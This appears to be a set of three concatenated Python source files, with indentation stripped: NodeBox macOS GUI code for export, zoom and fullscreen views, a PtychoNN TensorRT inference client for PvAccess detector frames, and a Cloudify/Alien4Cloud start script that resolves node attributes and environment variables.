outAttrs = PyDETextView.getBasicTextAttributes()
errAttrs = outAttrs.copy()
# XXX err color from user defaults...
errAttrs[NSForegroundColorAttributeName] = NSColor.redColor()
outputView = self.outputView
outputView.setSelectedRange_((outputView.textStorage().length(), 0))
lastErr = None
for isErr, data in output:
if isErr != lastErr:
attrs = [outAttrs, errAttrs][isErr]
outputView.setTypingAttributes_(attrs)
lastErr = isErr
outputView.insertText_(data)
# del self.output
@objc.IBAction
def copyImageAsPDF_(self, sender):
pboard = NSPasteboard.generalPasteboard()
# graphicsView implements the pboard delegate method to provide the data
pboard.declareTypes_owner_([NSPDFPboardType,NSPostScriptPboardType,NSTIFFPboardType], self.graphicsView)
@objc.IBAction
def exportAsImage_(self, sender):
exportPanel = NSSavePanel.savePanel()
exportPanel.setRequiredFileType_("pdf")
exportPanel.setNameFieldLabel_("Export To:")
exportPanel.setPrompt_("Export")
exportPanel.setCanSelectHiddenExtension_(True)
if not NSBundle.loadNibNamed_owner_("ExportImageAccessory", self):
NSLog("Error -- could not load ExportImageAccessory.")
self.exportImagePageCount.setIntValue_(1)
exportPanel.setAccessoryView_(self.exportImageAccessory)
path = self.fileName()
if path:
dirName, fileName = os.path.split(path)
fileName, ext = os.path.splitext(fileName)
fileName += ".pdf"
else:
dirName, fileName = None, "Untitled.pdf"
# If a file was already exported, use that folder as the default.
if self.exportDir is not None:
dirName = self.exportDir
exportPanel.beginSheetForDirectory_file_modalForWindow_modalDelegate_didEndSelector_contextInfo_(
dirName, fileName, NSApp().mainWindow(), self,
"exportPanelDidEnd:returnCode:contextInfo:", 0)
def exportPanelDidEnd_returnCode_contextInfo_(self, panel, returnCode, context):
if returnCode:
fname = panel.filename()
self.exportDir = os.path.split(fname)[0] # Save the directory we exported to.
pages = self.exportImagePageCount.intValue()
format = panel.requiredFileType()
panel.close()
self.doExportAsImage(fname, format, pages)
exportPanelDidEnd_returnCode_contextInfo_ = objc.selector(exportPanelDidEnd_returnCode_contextInfo_,
signature="v@:@ii")
@objc.IBAction
def exportImageFormatChanged_(self, sender):
image_formats = ('pdf', 'eps', 'png', 'tiff', 'jpg', 'gif')
panel = sender.window()
panel.setRequiredFileType_(image_formats[sender.indexOfSelectedItem()])
def doExportAsImage(self, fname, format, pages=1):
basename, ext = os.path.splitext(fname)
# When saving one page (the default), just save the current graphics
# context. When generating multiple pages, we run the script again
# (so we don't use the current displayed view) for the first page,
# and then for every next page.
if pages == 1:
if self.graphicsView.canvas is None:
self.runScript()
self.canvas.save(fname, format)
elif pages > 1:
pb = ProgressBarController.alloc().init()
pb.begin("Generating %s images..." % pages, pages)
try:
if not self.cleanRun(self._execScript): return
self._pageNumber = 1
self._frame = 1
# If the speed is set, we are dealing with animation
if self.canvas.speed is None:
for i in range(pages):
if i > 0: # Run has already happened first time
self.fastRun(self._execScript, newSeed=True)
counterAsString = "-%5d" % self._pageNumber
counterAsString = counterAsString.replace(' ', '0')
exportName = basename + counterAsString + ext
self.canvas.save(exportName, format)
self.graphicsView.setNeedsDisplay_(True)
self._pageNumber += 1
self._frame += 1
pb.inc()
else:
if self.namespace.has_key("setup"):
self.fastRun(self.namespace["setup"])
for i in range(pages):
self.fastRun(self.namespace["draw"], newSeed=True)
counterAsString = "-%5d" % self._pageNumber
counterAsString = counterAsString.replace(' ', '0')
exportName = basename + counterAsString + ext
self.canvas.save(exportName, format)
self.graphicsView.setNeedsDisplay_(True)
self._pageNumber += 1
self._frame += 1
pb.inc()
if self.namespace.has_key("stop"):
success, output = self._boxedRun(self.namespace["stop"])
self._flushOutput(output)
except KeyboardInterrupt:
pass
pb.end()
del pb
self._pageNumber = 1
self._frame = 1
@objc.IBAction
def exportAsMovie_(self, sender):
exportPanel = NSSavePanel.savePanel()
exportPanel.setRequiredFileType_("pdf")
exportPanel.setNameFieldLabel_("Export To:")
exportPanel.setPrompt_("Export")
exportPanel.setCanSelectHiddenExtension_(True)
exportPanel.setAllowedFileTypes_(["mov"])
if not NSBundle.loadNibNamed_owner_("ExportMovieAccessory", self):
NSLog("Error -- could not load ExportMovieAccessory.")
self.exportMovieFrames.setIntValue_(150)
self.exportMovieFps.setIntValue_(30)
exportPanel.setAccessoryView_(self.exportMovieAccessory)
path = self.fileName()
if path:
dirName, fileName = os.path.split(path)
fileName, ext = os.path.splitext(fileName)
fileName += ".mov"
else:
dirName, fileName = None, "Untitled.mov"
# If a file was already exported, use that folder as the default.
if self.exportDir is not None:
dirName = self.exportDir
exportPanel.beginSheetForDirectory_file_modalForWindow_modalDelegate_didEndSelector_contextInfo_(
dirName, fileName, NSApp().mainWindow(), self,
"qtPanelDidEnd:returnCode:contextInfo:", 0)
def qtPanelDidEnd_returnCode_contextInfo_(self, panel, returnCode, context):
if returnCode:
fname = panel.filename()
self.exportDir = os.path.split(fname)[0] # Save the directory we exported to.
frames = self.exportMovieFrames.intValue()
fps = self.exportMovieFps.floatValue()
panel.close()
if frames <= 0 or fps <= 0: return
self.doExportAsMovie(fname, frames, fps)
qtPanelDidEnd_returnCode_contextInfo_ = objc.selector(qtPanelDidEnd_returnCode_contextInfo_,
signature="v@:@ii")
def doExportAsMovie(self, fname, frames=60, fps=30):
# Only load QTSupport when necessary.
# QTSupport loads QTKit, which wants to establish a connection to the window server.
# If we load QTSupport before something is on screen, the connection to the window server
# cannot be established.
from nodebox.util import QTSupport
try:
os.unlink(fname)
except:
pass
try:
fp = open(fname, 'w')
fp.close()
except:
errorAlert("File Error", "Could not create file '%s'. Perhaps it is locked or busy." % fname)
return
movie = None
pb = ProgressBarController.alloc().init()
pb.begin("Generating %s frames..." % frames, frames)
try:
if not self.cleanRun(self._execScript): return
self._pageNumber = 1
self._frame = 1
movie = QTSupport.Movie(fname, fps)
# If the speed is set, we are dealing with animation
if self.canvas.speed is None:
for i in range(frames):
if i > 0: # Run has already happened first time
self.fastRun(self._execScript, newSeed=True)
movie.add(self.canvas)
self.graphicsView.setNeedsDisplay_(True)
pb.inc()
self._pageNumber += 1
self._frame += 1
else:
if self.namespace.has_key("setup"):
self.fastRun(self.namespace["setup"])
for i in range(frames):
self.fastRun(self.namespace["draw"], newSeed=True)
movie.add(self.canvas)
self.graphicsView.setNeedsDisplay_(True)
pb.inc()
self._pageNumber += 1
self._frame += 1
if self.namespace.has_key("stop"):
success, output = self._boxedRun(self.namespace["stop"])
self._flushOutput(output)
except KeyboardInterrupt:
pass
pb.end()
del pb
movie.save()
self._pageNumber = 1
self._frame = 1
@objc.IBAction
def printDocument_(self, sender):
op = NSPrintOperation.printOperationWithView_printInfo_(self.graphicsView, self.printInfo())
op.runOperationModalForWindow_delegate_didRunSelector_contextInfo_(
NSApp().mainWindow(), self, "printOperationDidRun:success:contextInfo:",
0)
def printOperationDidRun_success_contextInfo_(self, op, success, info):
if success:
self.setPrintInfo_(op.printInfo())
printOperationDidRun_success_contextInfo_ = objc.selector(printOperationDidRun_success_contextInfo_,
signature="v@:@ci")
@objc.IBAction
def buildInterface_(self, sender):
self.dashboardController.buildInterface(self.vars)
def validateMenuItem_(self, menuItem):
if menuItem.action() in ("exportAsImage:", "exportAsMovie:"):
return self.canvas is not None
return True
# Zoom commands, forwarding to the graphics view.
@objc.IBAction
def zoomIn_(self, sender):
if self.fullScreen is not None: return
self.graphicsView.zoomIn_(sender)
@objc.IBAction
def zoomOut_(self, sender):
if self.fullScreen is not None: return
self.graphicsView.zoomOut_(sender)
@objc.IBAction
def zoomToTag_(self, sender):
if self.fullScreen is not None: return
self.graphicsView.zoomTo_(sender.tag() / 100.0)
@objc.IBAction
def zoomToFit_(self, sender):
if self.fullScreen is not None: return
self.graphicsView.zoomToFit_(sender)
class FullscreenWindow(NSWindow):
def initWithRect_(self, fullRect):
super(FullscreenWindow, self).initWithContentRect_styleMask_backing_defer_(fullRect, NSBorderlessWindowMask, NSBackingStoreBuffered, True)
return self
def canBecomeKeyWindow(self):
return True
class FullscreenView(NSView):
def init(self):
super(FullscreenView, self).init()
self.mousedown = False
self.keydown = False
self.key = None
self.keycode = None
self.scrollwheel = False
self.wheeldelta = 0.0
return self
def setCanvas(self, canvas):
self.canvas = canvas
self.setNeedsDisplay_(True)
if not hasattr(self, "screenRect"):
self.screenRect = NSScreen.mainScreen().frame()
cw, ch = self.canvas.size
sw, sh = self.screenRect[1]
self.scalingFactor = calc_scaling_factor(cw, ch, sw, sh)
nw, nh = cw * self.scalingFactor, ch * self.scalingFactor
self.scaledSize = nw, nh
self.dx = (sw - nw) / 2.0
self.dy = (sh - nh) / 2.0
def drawRect_(self, rect):
NSGraphicsContext.currentContext().saveGraphicsState()
NSColor.blackColor().set()
NSRectFill(rect)
if self.canvas is not None:
t = NSAffineTransform.transform()
t.translateXBy_yBy_(self.dx, self.dy)
t.scaleBy_(self.scalingFactor)
t.concat()
clip = NSBezierPath.bezierPathWithRect_( ((0, 0), (self.canvas.width, self.canvas.height)) )
clip.addClip()
self.canvas.draw()
NSGraphicsContext.currentContext().restoreGraphicsState()
def isFlipped(self):
return True
def mouseDown_(self, event):
self.mousedown = True
def mouseUp_(self, event):
self.mousedown = False
def keyDown_(self, event):
self.keydown = True
self.key = event.characters()
self.keycode = event.keyCode()
def keyUp_(self, event):
self.keydown = False
self.key = event.characters()
self.keycode = event.keyCode()
def scrollWheel_(self, event):
self.scrollwheel = True
self.wheeldelta = event.deltaY()
def canBecomeKeyView(self):
return True
def acceptsFirstResponder(self):
return True
def calc_scaling_factor(width, height, maxwidth, maxheight):
return min(float(maxwidth) / width, float(maxheight) / height)
class ZoomPanel(NSView):
pass
# class defined in NodeBoxGraphicsView.xib
class NodeBoxGraphicsView(NSView):
document = objc.IBOutlet()
zoomLevel = objc.IBOutlet()
zoomField = objc.IBOutlet()
zoomSlider = objc.IBOutlet()
# The zoom levels are 10%, 25%, 50%, 75%, 100%, 200% and so on up to 2000%.
zoomLevels = [0.1, 0.25, 0.5, 0.75]
zoom = 1.0
while zoom <= 20.0:
zoomLevels.append(zoom)
zoom += 1.0
def awakeFromNib(self):
self.canvas = None
self._dirty = False
self.mousedown = False
self.keydown = False
self.key = None
self.keycode = None
self.scrollwheel = False
self.wheeldelta = 0.0
self._zoom = 1.0
self.setFrameSize_( (graphics.DEFAULT_WIDTH, graphics.DEFAULT_HEIGHT) )
self.setFocusRingType_(NSFocusRingTypeExterior)
if self.superview() is not None:
self.superview().setBackgroundColor_(VERY_LIGHT_GRAY)
def setCanvas(self, canvas):
self.canvas = canvas
if canvas is not None:
w, h = self.canvas.size
self.setFrameSize_([w*self._zoom, h*self._zoom])
self.markDirty()
def _get_zoom(self):
return self._zoom
def _set_zoom(self, zoom):
self._zoom = zoom
self.zoomLevel.setTitle_("%i%%" % (self._zoom * 100.0))
self.zoomSlider.setFloatValue_(self._zoom * 100.0)
self.setCanvas(self.canvas)
zoom = property(_get_zoom, _set_zoom)
@objc.IBAction
def dragZoom_(self, sender):
self.zoom = self.zoomSlider.floatValue() / 100.0
self.setCanvas(self.canvas)
def findNearestZoomIndex(self, zoom):
"""Returns the nearest zoom level, and whether we found a direct, exact
match or a fuzzy match."""
try: # Search for a direct hit first.
idx = self.zoomLevels.index(zoom)
return idx, True
except ValueError: # Can't find the zoom level, try looking at the indexes.
idx = 0
try:
while self.zoomLevels[idx] < zoom:
idx += 1
except KeyError: # End of the list
idx = len(self.zoomLevels) - 1 # Just return the last index.
return idx, False
@objc.IBAction
def zoomIn_(self, sender):
idx, direct = self.findNearestZoomIndex(self.zoom)
# Direct hits are perfect, but indirect hits require a bit of help.
# Because of the way indirect hits are calculated, they are already
# rounded up to the upper zoom level; this means we don't need to add 1.
if direct:
idx += 1
idx = max(min(idx, len(self.zoomLevels)-1), 0)
self.zoom = self.zoomLevels[idx]
@objc.IBAction
def zoomOut_(self, sender):
idx, direct = self.findNearestZoomIndex(self.zoom)
idx -= 1
idx = max(min(idx, len(self.zoomLevels)-1), 0)
self.zoom = self.zoomLevels[idx]
@objc.IBAction
def resetZoom_(self, sender):
self.zoom = 1.0
def zoomTo_(self, zoom):
self.zoom = zoom
@objc.IBAction
def zoomToFit_(self, sender):
w, h = self.canvas.size
fw, fh = self.superview().frame()[1]
factor = min(fw / w, fh / h)
self.zoom = factor
def markDirty(self, redraw=True):
self._dirty = True
if redraw:
self.setNeedsDisplay_(True)
def setFrameSize_(self, size):
self._image = None
NSView.setFrameSize_(self, size)
def isOpaque(self):
return False
def isFlipped(self):
return True
def drawRect_(self, rect):
if self.canvas is not None:
NSGraphicsContext.currentContext().saveGraphicsState()
try:
if self.zoom != 1.0:
t = NSAffineTransform.transform()
t.scaleBy_(self.zoom)
t.concat()
clip = NSBezierPath.bezierPathWithRect_( ((0, 0), (self.canvas.width, self.canvas.height)) )
clip.addClip()
self.canvas.draw()
except:
# A lot of code just to display the error in the output view.
etype, value, tb = sys.exc_info()
if tb.tb_next is not None:
tb = tb.tb_next # skip the frame doing the exec
traceback.print_exception(etype, value, tb)
data = "".join(traceback.format_exception(etype, value, tb))
attrs = PyDETextView.getBasicTextAttributes()
attrs[NSForegroundColorAttributeName] = NSColor.redColor()
outputView = self.document.outputView
outputView.setSelectedRange_((outputView.textStorage().length(), 0))
outputView.setTypingAttributes_(attrs)
outputView.insertText_(data)
NSGraphicsContext.currentContext().restoreGraphicsState()
def _updateImage(self):
if self._dirty:
self._image = self.canvas._nsImage
self._dirty = False
# pasteboard delegate method
def pasteboard_provideDataForType_(self, pboard, type):
if NSPDFPboardType:
pboard.setData_forType_(self.pdfData, NSPDFPboardType)
elif NSPostScriptPboardType:
pboard.setData_forType_(self.epsData, NSPostScriptPboardType)
elif NSTIFFPboardType:
pboard.setData_forType_(self.tiffData, NSTIFFPboardType)
def _get_pdfData(self):
if self.canvas:
return self.canvas._getImageData('pdf')
pdfData = property(_get_pdfData)
def _get_epsData(self):
if self.canvas:
return self.canvas._getImageData('eps')
epsData = property(_get_epsData)
def _get_tiffData(self):
return self.canvas._getImageData('tiff')
tiffData = property(_get_tiffData)
def _get_pngData(self):
return self.canvas._getImageData('png')
pngData = property(_get_pngData)
def _get_gifData(self):
return self.canvas._getImageData('gif')
gifData = property(_get_gifData)
def _get_jpegData(self):
return self.canvas._getImageData('jpeg')
jpegData = property(_get_jpegData)
def mouseDown_(self, event):
self.mousedown = True
def mouseUp_(self, event):
self.mousedown = False
def keyDown_(self, event):
self.keydown = True
self.key = event.characters()
self.keycode = event.keyCode()
def keyUp_(self, event):
self.keydown = False
self.key = event.characters()
self.keycode = event.keyCode()
def scrollWheel_(self, event):
NSResponder.scrollWheel_(self, event)
self.scrollwheel = True
self.wheeldelta = event.deltaY()
def canBecomeKeyView(self):
return True
def acceptsFirstResponder(self):
return True
class NodeBoxAppDelegate(NSObject):
def awakeFromNib(self):
self._prefsController = None
libDir = os.path.join(os.getenv("HOME"), "Library", "Application Support", "NodeBox")
try:
if not os.path.exists(libDir):
os.mkdir(libDir)
f = open(os.path.join(libDir, "README"), "w")
f.write("In this directory, you can put Python libraries to make them available to your scripts.\n")
f.close()
except OSError: pass
except IOError: pass
@objc.IBAction
def showPreferencesPanel_(self, sender):
if self._prefsController is None:
from nodebox.gui.mac.preferences import NodeBoxPreferencesController
self._prefsController = NodeBoxPreferencesController.alloc().init()
self._prefsController.showWindow_(sender)
@objc.IBAction
def generateCode_(self, sender):
"""Generate a piece of NodeBox code using OttoBot"""
from nodebox.util.ottobot import genProgram
controller = NSDocumentController.sharedDocumentController()
doc = controller.newDocument_(sender)
doc = controller.currentDocument()
doc.textView.setString_(genProgram())
doc.runScript()
@objc.IBAction
def showHelp_(self, sender):
url = NSURL.URLWithString_("http://nodebox.net/code/index.php/Reference")
NSWorkspace.sharedWorkspace().openURL_(url)
@objc.IBAction
def showSite_(self, sender):
url = NSURL.URLWithString_("http://nodebox.net/")
NSWorkspace.sharedWorkspace().openURL_(url)
def applicationWillTerminate_(self, note):
import atexit
atexit._run_exitfuncs()
|
main-edge-sm.py
|
import time, queue, threading, sys, os
import torch, argparse, logging
from pvaccess import Channel
from pvaccess import PvObject
import pvaccess as pva
import numpy as np
import tensorrt as trt
sys.path.insert(1, '/home/nvidia-agx/Inference/')
import PtychoNN
from framePreProcess import *
from tensorrtcode_batch import *
class pvaClient:
def __init__(self, nth=1):
self.last_uid = None
self.n_missed = 0
self.n_received = None
self.frame_dims = (516, 516)
self.debug_frame = np.zeros((128,128), dtype=np.int32)
self.frame_id = None
self.trt_engine_path = 'auto_PtychoNN_sm.trt'
self.resolution = (64,64)
self.server = pva.PvaServer()
self.channel_name = 'pvapy:image1'
#self.channel_name_infer = 'pvapy:image2'
self.server.addRecord(self.channel_name, pva.NtNdArray())
self.current_frame_id = 0
self.frame_map={}
self.n_generated_frames = 2
self.rows = 128
self.cols = 128
self.rows1 = 128
self.cols1 = 128
self.trt_outputs = ()
self.max_batch_size = 1
self.base_seq_id = None
self.frames_processed =0
self.trt_inference_wrapper = TRTInference(self.trt_engine_path,
trt_engine_datatype=trt.DataType.FLOAT,
batch_size=self.max_batch_size)
self.frame_tq = queue.Queue(maxsize=-1)
self.processed_tq = queue.Queue(maxsize=-1)
self.frame_id_tq = queue.Queue(maxsize=-1)
self.thr_exit = 0
self.recv_frames = None
for _ in range(nth):
threading.Thread(target=self.frame_process, daemon=True).start()
def frame_producer(self, frame_id, trt_outputs1, extraFieldsPvObject=None):
#for frame_id in range(0, self.n_generated_frames):
if extraFieldsPvObject is None:
nda = pva.NtNdArray()
else:
nda = pva.NtNdArray(extraFieldsPvObject.getStructureDict())
nda['uniqueId'] = frame_id
nda['codec'] = pva.PvCodec('pvapyc', pva.PvInt(5))
dims = [pva.PvDimension(self.rows, 0, self.rows, 1, False), \
pva.PvDimension(self.cols, 0, self.cols, 1, False)]
nda['dimension'] = dims
nda['compressedSize'] = self.rows*self.cols
nda['uncompressedSize'] = self.rows*self.cols
ts = self.get_timestamp()
nda['timeStamp'] = ts
nda['dataTimeStamp'] = ts
nda['descriptor'] = 'PvaPy Simulated Image'
nda['value'] = {'floatValue': trt_outputs1.flatten()}
attrs = [pva.NtAttribute('ColorMode', pva.PvInt(0))]
nda['attribute'] = attrs
if extraFieldsPvObject is not None:
nda.set(extraFieldsPvObject)
#self.frame_map[frame_id] = nda
return nda
def get_timestamp(self):
s = time.time()
ns = int((s-int(s))*1000000000)
s = int(s)
return pva.PvTimeStamp(s,ns)
def frame_process(self, ):
while self.thr_exit == 0:
try:
pv = self.frame_tq.get(block=True, timeout=1)
except queue.Empty:
continue
#logging.error("Queue is empty")
except:
#logging.error("Something else of the Queue went wrong")
continue
frm_id= pv['uniqueId']
dims = pv['dimension']
rows = dims[0]['size']
cols = dims[1]['size']
frame = pv['value'][0]['shortValue'].reshape((rows, cols))
self.frame_tq.task_done()
time0 = time.time()
processed_frame, pr_frm_id = frame_preprocess(frame, frm_id)
#print(processed_frame.max())
#print(processed_frame.sum())
#self.server.update(self.channel_name, self.frame_producer(frm_id, processed_frame))
#processed_frame = self.debug_frames
print("Time for pre-processing ", (time.time()-time0))
#for _pf in processed_frame:
self.processed_tq.put(processed_frame)
self.frame_id_tq.put(frm_id)
self.frames_processed += 1
elapsed = (time.time() - time0)
in_mb=[]
in_id =[] ## can be used to resent to the ImageJ
for i in range(self.max_batch_size):
_f = self.processed_tq.get()
_id = self.frame_id_tq.get()
in_mb.append(_f)
in_id.append(_id)
self.processed_tq.task_done()
self.frame_id_tq.task_done()
in_mb = np.array(in_mb)
in_id = np.array(in_id)
if (len(in_mb)==self.max_batch_size):
#print("entered for inference")
trt_outputs1, times = self.trt_inference_wrapper.infer(in_mb)
trt_outputs = np.asarray(trt_outputs1[0])
print(trt_outputs.shape)
print("Execution Times ", times)
#for _ in in_id:
self.server.update(self.channel_name, self.frame_producer(frm_id, trt_outputs1[0]))
print("Sent frame id", frm_id)
def monitor(self, pv):
uid = pv['uniqueId']
# ignore the 1st empty frame when use sv simulator
if self.recv_frames is None:
self.recv_frames = 0
return
if self.base_seq_id is None: self.base_seq_id = uid
self.recv_frames += 1
self.frame_tq.put(pv.copy())
logging.info("[%.3f] received frame %d, total frame received: %d, should have received: %d; %d frames pending process" % (\
time.time(), uid, self.recv_frames, uid - self.base_seq_id + 1, self.frame_tq.qsize()))
#def main_monitor(ch, nth, pv_request):
# give threads seconds to exit
#c.stopMonitor()
#c.unsubscribe('monitor')
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='')
parser.add_argument('-gpus', type=str, default="0", help='list of visiable GPUs')
parser.add_argument('-cn', type=str, default='QMPX3:Pva1:Image', help='pva channel name')
parser.add_argument('-qs', type=int, default=10000, help='queue size')
parser.add_argument('-nth', type=int, default=1, help='number of threads for frame processes')
parser.add_argument('-terminal', type=int, default=0, help='non-zero to print logs to stdout')
#parser.add_argument('-sf', type=int, default=0, help='specifies how many frames to skip')
args, unparsed = parser.parse_known_args()
if len(unparsed) > 0:
print('Unrecognized argument(s): \n%s \nProgram exiting ... ... ' % '\n'.join(unparsed))
exit(0)
if len(args.gpus) > 0:
os.environ['CUDA_VISIBLE_DEVICES'] = args.gpus
logging.basicConfig(filename='edgePtyhcoNN.log', level=logging.DEBUG,\
format='%(asctime)s %(levelname)-8s %(message)s',)
if args.terminal != 0:
logging.getLogger().addHandler(logging.StreamHandler(sys.stdout))
c = Channel(args.cn)
client = pvaClient(args.nth)
c.setMonitorMaxQueueLength(args.qs)
time.sleep(1)
pv_request = ''
c.monitor(client.monitor, pv_request)
time.sleep(1)
client.frame_tq.join()
client.processed_tq.join()
client.frame_id_tq.join()
#client.thr_exit = 1
time.sleep(10000)
trt_inference_wrapper.destroy()
c.stopMonitor()
|
_a4c_start.py
|
from cloudify import ctx
from cloudify.exceptions import NonRecoverableError
from cloudify.state import ctx_parameters as inputs
import subprocess
import os
import re
import sys
import time
import threading
import platform
from StringIO import StringIO
from cloudify_rest_client import CloudifyClient
from cloudify import utils
if 'MANAGER_REST_PROTOCOL' in os.environ and os.environ['MANAGER_REST_PROTOCOL'] == "https":
client = CloudifyClient(host=utils.get_manager_ip(), port=utils.get_manager_rest_service_port(), protocol='https', trust_all=True)
else:
client = CloudifyClient(host=utils.get_manager_ip(), port=utils.get_manager_rest_service_port())
def convert_env_value_to_string(envDict):
for key, value in envDict.items():
envDict[str(key)] = str(envDict.pop(key))
def get_attribute_user(ctx):
if get_attribute(ctx, 'user'):
return get_attribute(ctx, 'user')
else:
return get_attribute(ctx, 'cloudify_agent')['user']
def get_attribute_key(ctx):
if get_attribute(ctx, 'key'):
return get_attribute(ctx, 'key')
else:
return get_attribute(ctx, 'cloudify_agent')['key']
def get_host(entity):
if entity.instance.relationships:
for relationship in entity.instance.relationships:
if 'cloudify.relationships.contained_in' in relationship.type_hierarchy:
return relationship.target
return None
def has_attribute_mapping(entity, attribute_name):
ctx.logger.info('Check if it exists mapping for attribute {0} in {1}'.format(attribute_name, entity.node.properties))
mapping_configuration = entity.node.properties.get('_a4c_att_' + attribute_name, None)
if mapping_configuration is not None:
if mapping_configuration['parameters'][0] == 'SELF' and mapping_configuration['parameters'][1] == attribute_name:
return False
else:
return True
return False
def process_attribute_mapping(entity, attribute_name, data_retriever_function):
# This is where attribute mapping is defined in the cloudify type
mapping_configuration = entity.node.properties['_a4c_att_' + attribute_name]
ctx.logger.info('Mapping configuration found for attribute {0} is {1}'.format(attribute_name, mapping_configuration))
# If the mapping configuration exist and if it concerns SELF then just get attribute of the mapped attribute name
# Else if it concerns TARGET then follow the relationship and retrieved the mapped attribute name from the TARGET
if mapping_configuration['parameters'][0] == 'SELF':
return data_retriever_function(entity, mapping_configuration['parameters'][1])
elif mapping_configuration['parameters'][0] == 'TARGET' and entity.instance.relationships:
for relationship in entity.instance.relationships:
if mapping_configuration['parameters'][1] in relationship.type_hierarchy:
return data_retriever_function(relationship.target, mapping_configuration['parameters'][2])
return ""
def get_nested_attribute(entity, attribute_names):
deep_properties = get_attribute(entity, attribute_names[0])
attribute_names_iter = iter(attribute_names)
next(attribute_names_iter)
for attribute_name in attribute_names_iter:
if deep_properties is None:
return ""
else:
deep_properties = deep_properties.get(attribute_name, None)
return deep_properties
def _all_instances_get_nested_attribute(entity, attribute_names):
return None
def get_attribute(entity, attribute_name):
if has_attribute_mapping(entity, attribute_name):
# First check if any mapping exist for attribute
mapped_value = process_attribute_mapping(entity, attribute_name, get_attribute)
ctx.logger.info('Mapping exists for attribute {0} with value {1}'.format(attribute_name, mapped_value))
return mapped_value
# No mapping exist, try to get directly the attribute from the entity
attribute_value = entity.instance.runtime_properties.get(attribute_name, None)
if attribute_value is not None:
ctx.logger.info('Found the attribute {0} with value {1} on the node {2}'.format(attribute_name, attribute_value, entity.node.id))
return attribute_value
# Attribute retrieval fails, fall back to property
property_value = entity.node.properties.get(attribute_name, None)
if property_value is not None:
return property_value
# Property retrieval fails, fall back to host instance
host = get_host(entity)
if host is not None:
ctx.logger.info('Attribute not found {0} go up to the parent node {1}'.format(attribute_name, host.node.id))
return get_attribute(host, attribute_name)
# Nothing is found
return ""
def _all_instances_get_attribute(entity, attribute_name):
result_map = {}
# get all instances data using cfy rest client
# we have to get the node using the rest client with node_instance.node_id
# then we will have the relationships
node = client.nodes.get(ctx.deployment.id, entity.node.id)
all_node_instances = client.node_instances.list(ctx.deployment.id, entity.node.id)
for node_instance in all_node_instances:
prop_value = __recursively_get_instance_data(node, node_instance, attribute_name)
if prop_value is not None:
ctx.logger.info('Found the property/attribute {0} with value {1} on the node {2} instance {3}'.format(attribute_name, prop_value, entity.node.id,
node_instance.id))
result_map[node_instance.id + '_'] = prop_value
return result_map
def get_property(entity, property_name):
# Try to get the property value on the node
property_value = entity.node.properties.get(property_name, None)
if property_value is not None:
ctx.logger.info('Found the property {0} with value {1} on the node {2}'.format(property_name, property_value, entity.node.id))
return property_value
# No property found on the node, fall back to the host
host = get_host(entity)
if host is not None:
ctx.logger.info('Property not found {0} go up to the parent node {1}'.format(property_name, host.node.id))
return get_property(host, property_name)
return ""
def get_instance_list(node_id):
result = ''
all_node_instances = client.node_instances.list(ctx.deployment.id, node_id)
for node_instance in all_node_instances:
if len(result) > 0:
result += ','
result += node_instance.id
return result
def get_host_node_name(instance):
for relationship in instance.relationships:
if 'cloudify.relationships.contained_in' in relationship.type_hierarchy:
return relationship.target.node.id
return None
def __get_relationship(node, target_name, relationship_type):
for relationship in node.relationships:
if relationship.get('target_id') == target_name and relationship_type in relationship.get('type_hierarchy'):
return relationship
return None
def __has_attribute_mapping(node, attribute_name):
ctx.logger.info('Check if it exists mapping for attribute {0} in {1}'.format(attribute_name, node.properties))
mapping_configuration = node.properties.get('_a4c_att_' + attribute_name, None)
if mapping_configuration is not None:
if mapping_configuration['parameters'][0] == 'SELF' and mapping_configuration['parameters'][1] == attribute_name:
return False
else:
return True
return False
def __process_attribute_mapping(node, node_instance, attribute_name, data_retriever_function):
# This is where attribute mapping is defined in the cloudify type
mapping_configuration = node.properties['_a4c_att_' + attribute_name]
ctx.logger.info('Mapping configuration found for attribute {0} is {1}'.format(attribute_name, mapping_configuration))
# If the mapping configuration exist and if it concerns SELF then just get attribute of the mapped attribute name
# Else if it concerns TARGET then follow the relationship and retrieved the mapped attribute name from the TARGET
if mapping_configuration['parameters'][0] == 'SELF':
return data_retriever_function(node, node_instance, mapping_configuration['parameters'][1])
elif mapping_configuration['parameters'][0] == 'TARGET' and node_instance.relationships:
for rel in node_instance.relationships:
relationship = __get_relationship(node, rel.get('target_name'), rel.get('type'))
if mapping_configuration['parameters'][1] in relationship.get('type_hierarchy'):
target_instance = client.node_instances.get(rel.get('target_id'))
target_node = client.nodes.get(ctx.deployment.id, target_instance.node_id)
return data_retriever_function(target_node, target_instance, mapping_configuration['parameters'][2])
return None
def __recursively_get_instance_data(node, node_instance, attribute_name):
if __has_attribute_mapping(node, attribute_name):
return __process_attribute_mapping(node, node_instance, attribute_name, __recursively_get_instance_data)
attribute_value = node_instance.runtime_properties.get(attribute_name, None)
if attribute_value is not None:
return attribute_value
elif node_instance.relationships:
for rel in node_instance.relationships:
# on rel we have target_name, target_id (instanceId), type
relationship = __get_relationship(node, rel.get('target_name'), rel.get('type'))
if 'cloudify.relationships.contained_in' in relationship.get('type_hierarchy'):
parent_instance = client.node_instances.get(rel.get('target_id'))
parent_node = client.nodes.get(ctx.deployment.id, parent_instance.node_id)
return __recursively_get_instance_data(parent_node, parent_instance, attribute_name)
return None
else:
return None
def download(child_rel_path, child_abs_path, download_dir):
artifact_downloaded_path = ctx.download_resource(child_abs_path)
new_file = os.path.join(download_dir, child_rel_path)
new_file_dir = os.path.dirname(new_file)
if not os.path.exists(new_file_dir):
os.makedirs(new_file_dir)
os.rename(artifact_downloaded_path, new_file)
ctx.logger.info('Downloaded artifact from path ' + child_abs_path + ', it\'s available now at ' + new_file)
return new_file
def download_artifacts(artifacts, download_dir):
downloaded_artifacts = {}
os.makedirs(download_dir)
for artifact_name, artifact_ref in artifacts.items():
ctx.logger.info('Download artifact ' + artifact_name)
if isinstance(artifact_ref, basestring):
downloaded_artifacts[artifact_name] = download(os.path.basename(artifact_ref), artifact_ref, download_dir)
else:
child_download_dir = os.path.join(download_dir, artifact_name)
for child_path in artifact_ref:
download(child_path['relative_path'], child_path['absolute_path'], child_download_dir)
downloaded_artifacts[artifact_name] = child_download_dir
return downloaded_artifacts
env_map = {}
env_map['NODE'] = ctx.node.id
env_map['INSTANCE'] = ctx.instance.id
env_map['INSTANCES'] = get_instance_list(ctx.node.id)
env_map['HOST'] = get_host_node_name(ctx.instance)
env_map['A4C_EXECUTION_HOST'] = get_attribute(ctx, 'ip_address')
env_map['A4C_EXECUTION_USER'] = get_attribute_user(ctx)
env_map['A4C_EXECUTION_KEY'] = get_attribute_key(ctx)
